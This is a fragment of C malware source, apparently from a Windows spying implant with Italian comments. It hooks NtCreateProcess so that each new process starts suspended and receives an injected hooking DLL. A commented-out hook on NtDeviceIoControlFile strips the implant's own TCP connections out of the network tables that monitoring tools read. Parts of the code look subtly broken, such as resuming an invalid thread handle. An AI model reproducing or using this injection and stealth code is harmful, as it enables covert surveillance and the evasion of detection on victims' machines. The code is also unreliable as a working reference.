typedef struct {
	COMMONDATA;
	int PidExplorer;
	int RemoteHost;
	char szDLLName[256];
	char szHookThreadName[256];
} NTCreateProcessRWStruct, *PNTCreateProcessRWStruct;

NTCreateProcessRWStruct NTCreateProcessRWData;

static DWORD __stdcall WrapNtCreateProcess( PHANDLE hProcess,
											DWORD ARG2,
											DWORD ARG3,
											DWORD ARG4,
											DWORD ARG5,
											DWORD ARG6,
											DWORD ARG7,
											DWORD ARG8)
{
	HMODULE H4DLL;
	HANDLE hThread;
	HM_sStartHookingThread_t psStartHookingThread;
	
	// Carica H4
	H4DLL = pData->_LoadLibrary(pData->szDLLName);
	if (!H4DLL)
		return ret_code;
	// Indirizzo StartHookingThread
	psStartHookingThread = (HM_sStartHookingThread_t)pData->_GetProcAddress(H4DLL, pData->szHookThreadName);
	
	// Il processo deve essere sospeso allo startup
	ARG6 |= CREATE_SUSPENDED;

	// CAll api
	INIT_WRAPPER(NTCreateProcessRWStruct)
	CALL_ORIGINAL_API(8)	

	// Creazione ed esecuzione del Threddino
	hThread = psStartHookingThread(*hProcess, (PROCESS_INFORMATION *)ARG8->hThread);
	
	// Qualcosa e' andato storto resume del main thread
	if (hThread == INVALID_HANDLE_VALUE)
		ResumeThread(hThread);
	
	// Scarica H4
	pData->_FreeLibrary(H4DLL);

	return ret_code;
}
static DWORD WrapNtCreateProcess_setup(DWORD ARG1)
{
	HMODULE hMod;

	hMod = LoadLibrary("KERNEL32.DLL");

	// API utilizzate dal thread remoto.... [KERNEL32.DLL]
	NTCreateProcessRWData->pCommon._LoadLibrary = (LoadLibrary_T) GetProcAddress(hMod, "LoadLibraryA");
	NTCreateProcessRWData->pCommon._GetProcAddress = (GetProcAddress_T) GetProcAddress(hMod, "GetProcAddress");
	NTCreateProcessRWData->pCommon._FreeLibrary = (FreeLibrary_T) GetProcAddress(hMod, "FreeLibrary");
	
	// Variabili shared per la creazione degli Hooks...
	sprintf(NTCreateProcessRWData->szDLLName, "%s", "H4DLL.DLL");
	sprintf(NTCreateProcessRWData->szHookThreadName, "%s", "HM_sStartHookingThread");

	return 1;
}
/*
typedef struct {
	COMMONDATA;
	DWORD PID1;
	DWORD Remote_Host;
} NTDeviceIOContolFileStruct, *PNTDeviceIOContolFileStruct;

static DWORD WINAPI WrapNtDeviceIoControlFile(
  DWORD ARG1 ,
  DWORD ARG2,
  DWORD ARG3,
  DWORD ARG4,
  PIO_STATUS_BLOCK IoStatusBlock,
  ULONG IoControlCode,
  char * InputBuffer,
  ULONG InputBufferLength,
  PVOID OutputBuffer,
  ULONG OutputBufferLength)
{
	BOOL ext, inter = FALSE;

	if(	IoControlCode  == 0x00120003 &&
		InputBuffer && OutputBuffer &&  
		OutputBufferLength > 0 && 
		InputBufferLength > 0 &&
		InputBuffer[0] == 0x00 && 
		InputBuffer[1] == 0x04 && 
		InputBuffer[17] == 0x01)
	{
			inter = TRUE;
			if (InputBuffer[16] == 0x2)
				ext = TRUE;
			else
				ext = FALSE;
				
	}
	
	INIT_WRAPPER(NTDeviceIOContolFileStruct)
	CALL_ORIGINAL_API(10)	

	if(inter)
	{
		DWORD len = IoStatusBlock->Information;	

		MIB_TCPROW_EX *row_ex;
		MIB_TCPROW *row;
		char *Src;
		char *Dst;
		
		Src = (char *)OutputBuffer;
		Dst = (char *)OutputBuffer;
		IoStatusBlock->Information = 0;

		while (len > 0)
		{
			if(ext)
			{	
				row_ex = (MIB_TCPROW_EX *)Src;
				if (row_ex->dwProcessId != pData->PID1)
				{
					memcpy(Dst, Src, sizeof(MIB_TCPROW_EX));
					Dst += sizeof(MIB_TCPROW_EX);
					IoStatusBlock->Information  += sizeof(MIB_TCPROW_EX);
				}
				Src += sizeof(MIB_TCPROW_EX);
				len -= sizeof(MIB_TCPROW_EX);
			}
			else
			{
				row = (MIB_TCPROW *)Src;
				if(row->dwRemoteAddr != pData->Remote_Host)
				{
					memcpy(Dst, Src, sizeof(MIB_TCPROW));
					Dst += sizeof(MIB_TCPROW);
					IoStatusBlock->Information  += sizeof(MIB_TCPROW);
				}
				Src += sizeof(MIB_TCPROW);
				len -= sizeof(MIB_TCPROW);
			}
		}
	}

    return ret_code;
}

*/